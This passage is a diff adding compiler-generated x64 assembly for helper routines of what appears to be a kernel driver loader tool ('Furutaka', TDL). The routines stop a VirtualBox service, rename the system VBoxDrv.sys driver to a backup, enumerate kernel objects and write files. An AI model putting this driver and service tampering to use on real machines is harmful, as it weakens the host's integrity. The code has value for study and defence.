+ mov r8d, DWORD PTR rlen$[rsp]
+ mov edx, 8
+ mov rcx, QWORD PTR [rcx+48]
+ call QWORD PTR __imp_RtlAllocateHeap
+ mov rdi, rax
+ mov QWORD PTR objinf$[rsp], rax
+; Line 367
+ test rax, rax
+ je $LN3@supEnumSys
+; Line 370
+ lea rax, QWORD PTR rlen$[rsp]
+ mov QWORD PTR [rsp+48], rax
+ lea rax, QWORD PTR ctx$[rsp]
+ mov QWORD PTR [rsp+40], rax
+ mov BYTE PTR [rsp+32], 0
+ mov r9b, 1
+ mov r8d, DWORD PTR rlen$[rsp]
+ mov rdx, rdi
+ mov rcx, QWORD PTR hDirectory$[rsp]
+ call QWORD PTR __imp_NtQueryDirectoryObject
+ mov DWORD PTR status$[rsp], eax
+; Line 371
+ test eax, eax
+ js SHORT $LN39@supEnumSys
+; Line 376
+ mov rdx, rsi
+ mov rcx, rdi
+ call rbx
+ mov DWORD PTR CallbackStatus$[rsp], eax
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 22853
+ mov rax, QWORD PTR gs:48
+; File J:\Workspace\drivers\TDL\Source\Furutaka\ntos.h
+; Line 5120
+ mov rcx, QWORD PTR [rax+96]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 378
+ mov r8, QWORD PTR objinf$[rsp]
+ xor edx, edx
+ mov rcx, QWORD PTR [rcx+48]
+ call QWORD PTR __imp_RtlFreeHeap
+; Line 380
+ cmp DWORD PTR CallbackStatus$[rsp], 0
+ jl $LL4@supEnumSys
+; Line 381
+ and DWORD PTR status$[rsp], 0
+ jmp SHORT $LN3@supEnumSys
+$LN39@supEnumSys:
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 22853
+ mov rax, QWORD PTR gs:48
+; File J:\Workspace\drivers\TDL\Source\Furutaka\ntos.h
+; Line 5120
+ mov rcx, QWORD PTR [rax+96]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 372
+ mov r8, QWORD PTR objinf$[rsp]
+ xor edx, edx
+ mov rcx, QWORD PTR [rcx+48]
+ call QWORD PTR __imp_RtlFreeHeap
+$LN3@supEnumSys:
+; Line 387
+ mov rcx, QWORD PTR hDirectory$[rsp]
+ test rcx, rcx
+ je SHORT $LN15@supEnumSys
+; Line 388
+ call QWORD PTR __imp_NtClose
+$LN15@supEnumSys:
+; Line 391
+ jmp SHORT $LN21@supEnumSys
+$LN19@supEnumSys:
+; Line 393
+ mov DWORD PTR status$[rsp], -1073741819 ; ffffffffc0000005H
+$LN21@supEnumSys:
+; Line 396
+ mov eax, DWORD PTR status$[rsp]
+$LN1@supEnumSys:
+; Line 397
+ lea r11, QWORD PTR [rsp+160]
+ mov rbx, QWORD PTR [r11+16]
+ mov rsi, QWORD PTR [r11+24]
+ mov rsp, r11
+ pop rdi
+ ret 0
+supEnumSystemObjects ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supDetectObjectCallback
+_TEXT SEGMENT
+Entry$ = 48
+CallbackParam$ = 56
+supDetectObjectCallback PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 284
+$LN10:
+ sub rsp, 40 ; 00000028H
+; Line 287
+ test rcx, rcx
+ jne SHORT $LN2@supDetectO
+; Line 288
+ mov eax, -1073741585 ; ffffffffc00000efH
+ jmp SHORT $LN1@supDetectO
+$LN2@supDetectO:
+; Line 291
+ test rdx, rdx
+ jne SHORT $LN3@supDetectO
+; Line 292
+ mov eax, -1073741584 ; ffffffffc00000f0H
+ jmp SHORT $LN1@supDetectO
+$LN3@supDetectO:
+; Line 295
+ cmp QWORD PTR [rdx], 0
+ je SHORT $LN5@supDetectO
+ cmp DWORD PTR [rdx+8], 0
+ je SHORT $LN5@supDetectO
+; Line 299
+ mov rcx, QWORD PTR [rcx+8]
+ test rcx, rcx
+ je SHORT $LN7@supDetectO
+; Line 300
+ mov rdx, QWORD PTR [rdx]
+ call _strcmpi_w
+ test eax, eax
+ je SHORT $LN1@supDetectO
+$LN7@supDetectO:
+; Line 304
+ mov eax, -1073741823 ; ffffffffc0000001H
+ jmp SHORT $LN1@supDetectO
+$LN5@supDetectO:
+; Line 296
+ mov eax, -1073741664 ; ffffffffc00000a0H
+$LN1@supDetectO:
+; Line 305
+ add rsp, 40 ; 00000028H
+ ret 0
+supDetectObjectCallback ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supStopVBoxService
+_TEXT SEGMENT
+ssp$ = 48
+szMessage$ = 96
+schSCManager$ = 1184
+szSvcName$ = 1192
+dwBytesNeeded$ = 1200
+supStopVBoxService PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 458
+$LN42:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rsi
+ push rbp
+ push rdi
+ push r12
+ push r14
+ push r15
+ lea rbp, QWORD PTR [rsp-880]
+ sub rsp, 1136 ; 00000470H
+ mov rbx, rdx
+ mov rdi, rcx
+; Line 459
+ xor esi, esi
+; Line 463
+ call QWORD PTR __imp_GetTickCount
+; Line 471
+ lea rdx, OFFSET FLAT:??_C@_1CM@OCPAABHF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAA?$AAt?$AAt?$AAe?$AAm?$AAp?$AAt?$AA?5?$AAt?$AAo@
+ mov r14d, eax
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call _strcpy_w
+; Line 472
+ mov rdx, rbx
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call _strcat_w
+; Line 473
+ lea r15d, QWORD PTR [rsi+1]
+ mov edx, r15d
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call cuiPrintTextW
+; Line 478
+ lea r8d, QWORD PTR [rsi+36]
+ mov rdx, rbx
+ mov rcx, rdi
+ call QWORD PTR __imp_OpenServiceW
+ mov rbx, rax
+; Line 484
+ test rax, rax
+ jne SHORT $LN8@supStopVBo
+; Line 485
+ call QWORD PTR __imp_GetLastError
+; Line 486
+ cmp eax, 1060 ; 00000424H
+ jne SHORT $LN7@supStopVBo
+; Line 487
+ mov edx, r15d
+ lea rcx, OFFSET FLAT:??_C@_1EE@PHBHNLM@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAd?$AAo@
+ call cuiPrintTextW
+; Line 488
+ mov al, r15b
+ jmp $LN1@supStopVBo
+$LN7@supStopVBo:
+; Line 491
+ call QWORD PTR __imp_GetLastError
+ mov edx, eax
+ lea rcx, OFFSET FLAT:??_C@_1BI@BPEMHDAO@?$AAO?$AAp?$AAe?$AAn?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@
+ call supxStopServiceShowError
+; Line 492
+ xor al, al
+ jmp $LN1@supStopVBo
+$LN8@supStopVBo:
+; Line 499
+ lea rax, QWORD PTR dwBytesNeeded$[rbp-256]
+ mov r9d, 36 ; 00000024H
+ lea r8, QWORD PTR ssp$[rsp]
+ mov QWORD PTR [rsp+32], rax
+ xor edx, edx
+ mov rcx, rbx
+ call QWORD PTR __imp_QueryServiceStatusEx
+ test eax, eax
+ jne SHORT $LN9@supStopVBo
+$LN24@supStopVBo:
+; Line 603
+ call QWORD PTR __imp_GetLastError
+ lea rcx, OFFSET FLAT:??_C@_1CK@IBJMKCMP@?$AAQ?$AAu?$AAe?$AAr?$AAy?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AAS?$AAt?$AAa@
+$LN40@supStopVBo:
+ mov edx, eax
+ call supxStopServiceShowError
+ jmp $stop_cleanup$43
+$LN9@supStopVBo:
+; Line 510
+ cmp DWORD PTR ssp$[rsp+4], r15d
+ jne SHORT $LN22@supStopVBo
+; Line 511
+ lea rcx, OFFSET FLAT:??_C@_1EA@ONGKHKHC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAi?$AAs@
+; Line 513
+ jmp $LN34@supStopVBo
+$LN22@supStopVBo:
+; Line 519
+ cmp DWORD PTR ssp$[rsp+4], 3
+ jne $LN3@supStopVBo
+ mov edi, 1000 ; 000003e8H
+ mov r12d, 10000 ; 00002710H
+$LL2@supStopVBo:
+; Line 521
+ mov edx, r15d
+ lea rcx, OFFSET FLAT:??_C@_1DK@FIJGIPBO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@
+ call cuiPrintTextW
+; Line 523
+ mov eax, -858993459 ; cccccccdH
+ mul DWORD PTR ssp$[rsp+24]
+ shr edx, 3
+; Line 525
+ cmp edx, edi
+ jae SHORT $LN11@supStopVBo
+; Line 526
+ mov edx, edi
+ jmp SHORT $LN13@supStopVBo
+$LN11@supStopVBo:
+; Line 527
+ cmp edx, r12d
+ cmova edx, r12d
+$LN13@supStopVBo:
+; Line 530
+ mov ecx, edx
+ call QWORD PTR __imp_Sleep
+; Line 532
+ lea rax, QWORD PTR dwBytesNeeded$[rbp-256]
+ mov r9d, 36 ; 00000024H
+ lea r8, QWORD PTR ssp$[rsp]
+ mov QWORD PTR [rsp+32], rax
+ xor edx, edx
+ mov rcx, rbx
+ call QWORD PTR __imp_QueryServiceStatusEx
+ test eax, eax
+ je $LN24@supStopVBo
+; Line 543
+ cmp DWORD PTR ssp$[rsp+4], r15d
+ je $LN5@supStopVBo
+; Line 553
+ call QWORD PTR __imp_GetTickCount
+ sub eax, r14d
+ cmp eax, 30000 ; 00007530H
+ ja SHORT $LN26@supStopVBo
+; Line 519
+ cmp DWORD PTR ssp$[rsp+4], 3
+ je SHORT $LL2@supStopVBo
+$LN3@supStopVBo:
+; Line 562
+ lea r8, QWORD PTR ssp$[rsp]
+ mov edx, r15d
+ mov rcx, rbx
+ call QWORD PTR __imp_ControlService
+ test eax, eax
+ jne SHORT $LN36@supStopVBo
+; Line 567
+ call QWORD PTR __imp_GetLastError
+ lea rcx, OFFSET FLAT:??_C@_1BO@OEEIJKOC@?$AAC?$AAo?$AAn?$AAt?$AAr?$AAo?$AAl?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@
+; Line 568
+ jmp $LN40@supStopVBo
+$LN26@supStopVBo:
+; Line 554
+ lea rcx, OFFSET FLAT:??_C@_1DM@KJCMNIP@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@
+ jmp $LN39@supStopVBo
+$LL4@supStopVBo:
+; Line 576
+ mov ecx, DWORD PTR ssp$[rsp+24]
+ call QWORD PTR __imp_Sleep
+; Line 577
+ lea rax, QWORD PTR dwBytesNeeded$[rbp-256]
+ mov r9d, 36 ; 00000024H
+ lea r8, QWORD PTR ssp$[rsp]
+ mov QWORD PTR [rsp+32], rax
+ xor edx, edx
+ mov rcx, rbx
+ call QWORD PTR __imp_QueryServiceStatusEx
+ test eax, eax
+ je $LN24@supStopVBo
+; Line 588
+ cmp DWORD PTR ssp$[rsp+4], r15d
+ je SHORT $LN5@supStopVBo
+; Line 594
+ call QWORD PTR __imp_GetTickCount
+ sub eax, r14d
+ cmp eax, 30000 ; 00007530H
+ ja SHORT $LN29@supStopVBo
+$LN36@supStopVBo:
+; Line 574
+ cmp DWORD PTR ssp$[rsp+4], r15d
+ jne SHORT $LL4@supStopVBo
+$LN5@supStopVBo:
+; Line 603
+ lea rcx, OFFSET FLAT:??_C@_1EE@CLBBMPNC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@
+$LN34@supStopVBo:
+ mov edx, r15d
+ call cuiPrintTextW
+ mov sil, r15b
+$stop_cleanup$43:
+ mov rcx, rbx
+ call QWORD PTR __imp_CloseServiceHandle
+; Line 605
+ mov al, sil
+$LN1@supStopVBo:
+; Line 606
+ lea r11, QWORD PTR [rsp+1136]
+ mov rbx, QWORD PTR [r11+48]
+ mov rsi, QWORD PTR [r11+56]
+ mov rsp, r11
+ pop r15
+ pop r14
+ pop r12
+ pop rdi
+ pop rbp
+ ret 0
+$LN29@supStopVBo:
+; Line 595
+ lea rcx, OFFSET FLAT:??_C@_1CI@BLLFIFDA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAW?$AAa?$AAi?$AAt?$AA?5?$AAt?$AAi?$AAm?$AAe?$AAd@
+$LN39@supStopVBo:
+; Line 603
+ mov edx, r15d
+ call cuiPrintTextW
+ jmp SHORT $stop_cleanup$43
+supStopVBoxService ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supIsObjectExists
+_TEXT SEGMENT
+Param$ = 32
+RootDirectory$ = 64
+ObjectName$ = 72
+supIsObjectExists PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 411
+$LN5:
+ push rbx
+ sub rsp, 48 ; 00000030H
+ mov rbx, rcx
+; Line 414
+ test rdx, rdx
+ jne SHORT $LN2@supIsObjec
+; Line 415
+ xor al, al
+ jmp SHORT $LN1@supIsObjec
+$LN2@supIsObjec:
+; Line 419
+ mov rcx, rdx
+ mov QWORD PTR Param$[rsp], rdx
+ call _strlen_w
+; Line 421
+ lea r9, QWORD PTR Param$[rsp]
+ mov DWORD PTR Param$[rsp+8], eax
+ lea r8, OFFSET FLAT:supDetectObjectCallback
+ xor edx, edx
+ mov rcx, rbx
+ call supEnumSystemObjects
+ test eax, eax
+ setns al
+$LN1@supIsObjec:
+; Line 422
+ add rsp, 48 ; 00000030H
+ pop rbx
+ ret 0
+supIsObjectExists ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supWriteBufferToFile
+_TEXT SEGMENT
+IoStatus$ = 96
+Position$ = 112
+BytesWritten$ = 120
+BlockIndex$ = 128
+NtFileName$ = 136
+ptr$ = 152
+attr$ = 160
+lpFileName$ = 256
+hFile$ = 264
+Buffer$ = 264
+Size$ = 272
+Flush$ = 280
+Append$ = 288
+supWriteBufferToFile PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 189
+$LN33:
+ mov rax, rsp
+ mov QWORD PTR [rax+8], rbx
+ mov QWORD PTR [rax+24], rsi
+ mov DWORD PTR [rax+32], r9d
+ push rdi
+ push r12
+ push r13
+ push r14
+ push r15
+ sub rsp, 208 ; 000000d0H
+ mov r13d, r9d
+ mov rsi, r8
+ mov r14, rdx
+; Line 192
+ xor r15d, r15d
+ mov QWORD PTR [rax+16], r15
+; Line 202
+ mov ebx, r15d
+; Line 204
+ xor r9d, r9d
+ xor r8d, r8d
+ lea rdx, QWORD PTR [rax-112]
+ call QWORD PTR __imp_RtlDosPathNameToNtPathName_U
+ test al, al
+ jne SHORT $LN5@supWriteBu
+; Line 205
+ xor eax, eax
+$LN1@supWriteBu:
+; Line 270
+ lea r11, QWORD PTR [rsp+208]
+ mov rbx, QWORD PTR [r11+48]
+ mov rsi, QWORD PTR [r11+64]
+ mov rsp, r11
+ pop r15
+ pop r14
+ pop r13
+ pop r12
+ pop rdi
+ ret 0
+$LN5@supWriteBu:
+; Line 215
+ mov edi, DWORD PTR Append$[rsp]
+ mov eax, edi
+ neg eax
+ sbb ecx, ecx
+ and ecx, -2 ; fffffffeH
+ add ecx, 5
+ mov eax, edi
+ neg eax
+ sbb edx, edx
+ neg edx
+ add edx, 1048578 ; 00100002H
+ mov DWORD PTR attr$[rsp], 48 ; 00000030H
+ mov QWORD PTR attr$[rsp+8], r15
+ mov DWORD PTR attr$[rsp+24], 64 ; 00000040H
+ lea rax, QWORD PTR NtFileName$[rsp]
+ mov QWORD PTR attr$[rsp+16], rax
+ xorps xmm0, xmm0
+ movdqu XMMWORD PTR attr$[rsp+32], xmm0
+; Line 218
+ mov DWORD PTR [rsp+80], r15d
+ mov QWORD PTR [rsp+72], r15
+ mov DWORD PTR [rsp+64], 96 ; 00000060H
+ mov DWORD PTR [rsp+56], ecx
+ mov DWORD PTR [rsp+48], r15d
+ mov DWORD PTR [rsp+40], 128 ; 00000080H
+ mov QWORD PTR [rsp+32], r15
+ lea r9, QWORD PTR IoStatus$[rsp]
+ lea r8, QWORD PTR attr$[rsp]
+ lea rcx, QWORD PTR hFile$[rsp]
+ call QWORD PTR __imp_NtCreateFile
+; Line 222
+ test eax, eax
+ js $LN14@supWriteBu
+; Line 225
+ mov r12, r15
+; Line 227
+ test edi, edi
+ je SHORT $LN9@supWriteBu
+; Line 228
+ or DWORD PTR Position$[rsp], -1 ; ffffffffH
+; Line 229
+ or DWORD PTR Position$[rsp+4], -1
+; Line 230
+ lea r12, QWORD PTR Position$[rsp]
+$LN9@supWriteBu:
+; Line 233
+ mov eax, -2147483648 ; 80000000H
+ cmp rsi, rax
+ jae SHORT $LN10@supWriteBu
+; Line 235
+ mov QWORD PTR [rsp+64], r15
+ mov QWORD PTR [rsp+56], r12
+ mov DWORD PTR [rsp+48], esi
+ mov QWORD PTR [rsp+40], r14
+ lea rax, QWORD PTR IoStatus$[rsp]
+ mov QWORD PTR [rsp+32], rax
+ xor r9d, r9d
+ xor r8d, r8d
+ xor edx, edx
+ mov rcx, QWORD PTR hFile$[rsp]
+ call QWORD PTR __imp_NtWriteFile
+; Line 236
+ test eax, eax
+ js $LN14@supWriteBu
+; Line 239
+ mov rbx, QWORD PTR IoStatus$[rsp+8]
+; Line 240
+ jmp $LN31@supWriteBu
+$LN10@supWriteBu:
+; Line 243
+ mov rax, 8589934597 ; 0000000200000005H
+ mul rsi
+ mov r15, rsi
+ sub r15, rdx
+ shr r15, 1
+ add r15, rdx
+ shr r15, 30
+; Line 244
+ xor edi, edi
+$LN30@supWriteBu:
+ mov QWORD PTR BlockIndex$[rsp], rdi
+ cmp rdi, r15
+ jae SHORT $LN3@supWriteBu
+; Line 246
+ and QWORD PTR [rsp+64], 0
+ mov QWORD PTR [rsp+56], r12
+ mov DWORD PTR [rsp+48], 2147483647 ; 7fffffffH
+ mov QWORD PTR [rsp+40], r14
+ lea rax, QWORD PTR IoStatus$[rsp]
+ mov QWORD PTR [rsp+32], rax
+ xor r9d, r9d
+ xor r8d, r8d
+ xor edx, edx
+ mov rcx, QWORD PTR hFile$[rsp]
+ call QWORD PTR __imp_NtWriteFile
+; Line 247
+ test eax, eax
+ js $LN14@supWriteBu
+; Line 250
+ add r14, 2147483647 ; 7fffffffH
+ mov QWORD PTR ptr$[rsp], r14
+; Line 251
+ add rbx, QWORD PTR IoStatus$[rsp+8]
+ mov QWORD PTR BytesWritten$[rsp], rbx
+; Line 244
+ inc rdi
+ jmp SHORT $LN30@supWriteBu
+$LN3@supWriteBu:
+; Line 253
+ mov rax, 8589934597 ; 0000000200000005H
+ mul rsi
+ mov rax, rsi
+ sub rax, rdx
+ shr rax, 1
+ add rax, rdx
+ shr rax, 30
+ imul rax, rax, 2147483647 ; 7fffffffH
+ sub rsi, rax
+; Line 254
+ xor r15d, r15d
+ test esi, esi
+ je SHORT $LN14@supWriteBu
+; Line 255
+ mov QWORD PTR [rsp+64], r15
+ mov QWORD PTR [rsp+56], r12
+ mov DWORD PTR [rsp+48], esi
+ mov QWORD PTR [rsp+40], r14
+ lea rax, QWORD PTR IoStatus$[rsp]
+ mov QWORD PTR [rsp+32], rax
+ xor r9d, r9d
+ xor r8d, r8d
+ xor edx, edx
+ mov rcx, QWORD PTR hFile$[rsp]
+ call QWORD PTR __imp_NtWriteFile
+; Line 256
+ test eax, eax
+ js SHORT $LN14@supWriteBu
+; Line 258
+ add rbx, QWORD PTR IoStatus$[rsp+8]
+$LN31@supWriteBu:
+ mov QWORD PTR BytesWritten$[rsp], rbx
+$LN14@supWriteBu:
+$LN25@supWriteBu:
+; Line 263
+ mov rcx, QWORD PTR hFile$[rsp]
+ test rcx, rcx
+ je SHORT $LN20@supWriteBu
+; Line 264
+ test r13d, r13d
+ je SHORT $LN19@supWriteBu
+ lea rdx, QWORD PTR IoStatus$[rsp]
+ call QWORD PTR __imp_NtFlushBuffersFile
+ mov rcx, QWORD PTR hFile$[rsp]
+$LN19@supWriteBu:
+; Line 265
+ call QWORD PTR __imp_NtClose
+$LN20@supWriteBu:
+; Line 267
+ lea rcx, QWORD PTR NtFileName$[rsp]
+ call QWORD PTR __imp_RtlFreeUnicodeString
+; Line 269
+ mov rax, rbx
+ jmp $LN1@supWriteBu
+supWriteBufferToFile ENDP
+_TEXT ENDS
+; COMDAT text$x
+text$x SEGMENT
+IoStatus$ = 96
+Position$ = 112
+BytesWritten$ = 120
+BlockIndex$ = 128
+NtFileName$ = 136
+ptr$ = 152
+attr$ = 160
+lpFileName$ = 256
+hFile$ = 264
+Buffer$ = 264
+Size$ = 272
+Flush$ = 280
+Append$ = 288
+supWriteBufferToFile$fin$0 PROC
+; Line 261
+ push rbp
+ sub rsp, 96 ; 00000060H
+ mov rbp, rdx
+$LN22@supWriteBu:
+; Line 263
+ mov rcx, QWORD PTR hFile$[rbp]
+ test rcx, rcx
+ je SHORT $LN16@supWriteBu
+; Line 264
+ cmp DWORD PTR Flush$[rbp], 0
+ je SHORT $LN17@supWriteBu
+ lea rdx, QWORD PTR IoStatus$[rbp]
+ call QWORD PTR __imp_NtFlushBuffersFile
+ mov rcx, QWORD PTR hFile$[rbp]
+$LN17@supWriteBu:
+; Line 265
+ call QWORD PTR __imp_NtClose
+ npad 1
+$LN16@supWriteBu:
+; Line 267
+ lea rcx, QWORD PTR NtFileName$[rbp]
+ call QWORD PTR __imp_RtlFreeUnicodeString
+ npad 1
+$LN23@supWriteBu:
+ add rsp, 96 ; 00000060H
+ pop rbp
+ ret 0
+ int 3
+supWriteBufferToFile$fin$0 ENDP
+text$x ENDS
+; Function compile flags: /Ogspy
+; COMDAT text$x
+text$x SEGMENT
+IoStatus$ = 96
+Position$ = 112
+BytesWritten$ = 120
+BlockIndex$ = 128
+NtFileName$ = 136
+ptr$ = 152
+attr$ = 160
+lpFileName$ = 256
+hFile$ = 264
+Buffer$ = 264
+Size$ = 272
+Flush$ = 280
+Append$ = 288
+supWriteBufferToFile$fin$0 PROC
+; Line 261
+ push rbp
+ sub rsp, 96 ; 00000060H
+ mov rbp, rdx
+$LN22@supWriteBu:
+; Line 263
+ mov rcx, QWORD PTR hFile$[rbp]
+ test rcx, rcx
+ je SHORT $LN16@supWriteBu
+; Line 264
+ cmp DWORD PTR Flush$[rbp], 0
+ je SHORT $LN17@supWriteBu
+ lea rdx, QWORD PTR IoStatus$[rbp]
+ call QWORD PTR __imp_NtFlushBuffersFile
+ mov rcx, QWORD PTR hFile$[rbp]
+$LN17@supWriteBu:
+; Line 265
+ call QWORD PTR __imp_NtClose
+ npad 1
+$LN16@supWriteBu:
+; Line 267
+ lea rcx, QWORD PTR NtFileName$[rbp]
+ call QWORD PTR __imp_RtlFreeUnicodeString
+ npad 1
+$LN23@supWriteBu:
+ add rsp, 96 ; 00000060H
+ pop rbp
+ ret 0
+ int 3
+supWriteBufferToFile$fin$0 ENDP
+text$x ENDS
+; Function compile flags: /Ogspy
+; COMDAT supBackupVBoxDrv
+_TEXT SEGMENT
+szOldDriverName$ = 32
+szDriverDirName$ = 1072
+szNewDriverName$ = 2112
+bRestore$ = 3168
+supBackupVBoxDrv PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 141
+$LN9:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rdi
+ push rbp
+ lea rbp, QWORD PTR [rsp-2896]
+ sub rsp, 3152 ; 00000c50H
+ mov edi, ecx
+; Line 147
+ mov edx, 260 ; 00000104H
+ lea rcx, QWORD PTR szDriverDirName$[rbp-256]
+ xor ebx, ebx
+ call QWORD PTR __imp_GetSystemDirectoryW
+ test eax, eax
+ je $LN1@supBackupV
+$LN2@supBackupV:
+; Line 151
+ lea rdx, OFFSET FLAT:??_C@_1BE@HOKNBJFH@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2@
+ lea rcx, QWORD PTR szDriverDirName$[rbp-256]
+ call _strcat_w
+; Line 153
+ lea rdx, QWORD PTR szDriverDirName$[rbp-256]
+ lea rcx, QWORD PTR szOldDriverName$[rsp]
+ call _strcpy_w
+ lea rcx, QWORD PTR szOldDriverName$[rsp]
+ test edi, edi
+ je SHORT $LN3@supBackupV
+; Line 155
+ lea rdx, OFFSET FLAT:??_C@_1BO@PJIGFGPE@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAb?$AAa?$AAc?$AAk?$AAu?$AAp@
+ call _strcat_w
+; Line 156
+ lea rcx, QWORD PTR szOldDriverName$[rsp]
+ call QWORD PTR __imp_GetFileAttributesW
+ cmp eax, -1 ; ffffffffH
+ je SHORT $LN4@supBackupV
+; Line 157
+ lea rdx, QWORD PTR szDriverDirName$[rbp-256]
+ lea rcx, QWORD PTR szNewDriverName$[rbp-256]
+ call _strcpy_w
+; Line 158
+ lea rdx, OFFSET FLAT:??_C@_1BI@MANNKNNC@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAs?$AAy?$AAs@
+; Line 162
+ jmp SHORT $LN7@supBackupV
+$LN3@supBackupV:
+; Line 165
+ lea rdx, OFFSET FLAT:??_C@_1BI@MANNKNNC@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAs?$AAy?$AAs@
+ call _strcat_w
+; Line 166
+ lea rdx, QWORD PTR szDriverDirName$[rbp-256]
+ lea rcx, QWORD PTR szNewDriverName$[rbp-256]
+ call _strcpy_w
+; Line 167
+ lea rdx, OFFSET FLAT:??_C@_1BO@PJIGFGPE@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAb?$AAa?$AAc?$AAk?$AAu?$AAp@
+$LN7@supBackupV:
+; Line 171
+ lea rcx, QWORD PTR szNewDriverName$[rbp-256]
+ call _strcat_w
+ mov r8d, 9
+ lea rdx, QWORD PTR szNewDriverName$[rbp-256]
+ lea rcx, QWORD PTR szOldDriverName$[rsp]
+ call QWORD PTR __imp_MoveFileExW
+ mov ebx, eax
+$LN4@supBackupV:
+ mov eax, ebx
+$LN1@supBackupV:
+; Line 172
+ lea r11, QWORD PTR [rsp+3152]
+ mov rbx, QWORD PTR [r11+16]
+ mov rdi, QWORD PTR [r11+24]
+ mov rsp, r11
+ pop rbp
+ ret 0
+supBackupVBoxDrv ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supQueryResourceData
+_TEXT SEGMENT
+DataEntry$ = 32
+IdPath$ = 40
+ResourceId$ = 80
+SizeOfData$ = 88
+DllHandle$ = 88
+DataSize$ = 96
+Data$ = 104
+supQueryResourceData PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 104
+$LN9:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+24], rdi
+ push rbp
+ mov rbp, rsp
+ sub rsp, 64 ; 00000040H
+; Line 108
+ and QWORD PTR Data$[rbp-64], 0
+ mov rbx, r8
+; Line 109
+ and DWORD PTR SizeOfData$[rbp-64], 0
+ mov rdi, rdx
+; Line 111
+ test rdx, rdx
+ je SHORT $LN7@supQueryRe
+; Line 115
+ and QWORD PTR IdPath$[rbp-48], 0
+; Line 117
+ lea r9, QWORD PTR DataEntry$[rbp-64]
+ mov QWORD PTR IdPath$[rbp-56], rcx
+ lea rdx, QWORD PTR IdPath$[rbp-64]
+ mov rcx, rdi
+ mov QWORD PTR IdPath$[rbp-64], 10
+ mov r8d, 3
+ call QWORD PTR __imp_LdrFindResource_U
+; Line 118
+ test eax, eax
+ js SHORT $LN7@supQueryRe
+; Line 119
+ mov rdx, QWORD PTR DataEntry$[rbp-64]
+ lea r9, QWORD PTR SizeOfData$[rbp-64]
+ lea r8, QWORD PTR Data$[rbp-64]
+ mov rcx, rdi
+ call QWORD PTR __imp_LdrAccessResource
+; Line 120
+ test eax, eax
+ js SHORT $LN7@supQueryRe
+; Line 121
+ test rbx, rbx
+ je SHORT $LN7@supQueryRe
+; Line 122
+ mov eax, DWORD PTR SizeOfData$[rbp-64]
+ mov DWORD PTR [rbx], eax
+$LN7@supQueryRe:
+; Line 127
+ mov rax, QWORD PTR Data$[rbp-64]
+; Line 128
+ mov rbx, QWORD PTR [rsp+80]
+ mov rdi, QWORD PTR [rsp+96]
+ add rsp, 64 ; 00000040H
+ pop rbp
+ ret 0
+supQueryResourceData ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supGetSystemInfo
+_TEXT SEGMENT
+InfoClass$ = 64
+memIO$ = 72
+supGetSystemInfo PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 30
+$LN22:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+24], rbp
+ push rsi
+ push rdi
+ push r14
+ sub rsp, 32 ; 00000020H
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 22853
+ mov rax, QWORD PTR gs:48
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 30
+ mov r14d, ecx
+; Line 31
+ xor ebp, ebp
+; Line 33
+ mov edi, 4096 ; 00001000H
+; Line 36
+ mov rdx, QWORD PTR [rax+96]
+ mov rsi, QWORD PTR [rdx+48]
+$LL4@supGetSyst:
+; Line 39
+ mov r8d, edi
+ mov edx, 8
